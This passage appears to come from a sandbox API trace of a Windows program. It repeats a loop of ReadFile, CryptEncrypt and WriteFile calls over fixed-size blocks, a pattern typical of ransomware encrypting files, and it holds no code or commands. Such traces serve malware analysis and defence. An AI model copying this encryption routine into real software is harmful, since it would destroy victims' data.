pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.752] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.752] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.752] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.752] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.753] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.753] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.753] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.753] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.753] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.754] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.754] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.754] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.754] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.754] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.754] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.754] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.755] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.755] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.755] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.755] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.755] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.755] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.756] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.756] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.756] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.756] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.756] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.756] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.757] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.757] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.757] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.757] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.757] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.757] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.758] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.758] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.758] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.758] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.758] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.758] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] CryptEncrypt (in: hKey=0x2e7fc00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9dcd8*=0x380) returned 1 [0265.759] WriteFile (in: hFile=0x5d14, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9dcd8*=0x380, lpOverlapped=0x0) returned 1 [0265.759] ReadFile (in: hFile=0x5d10, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: 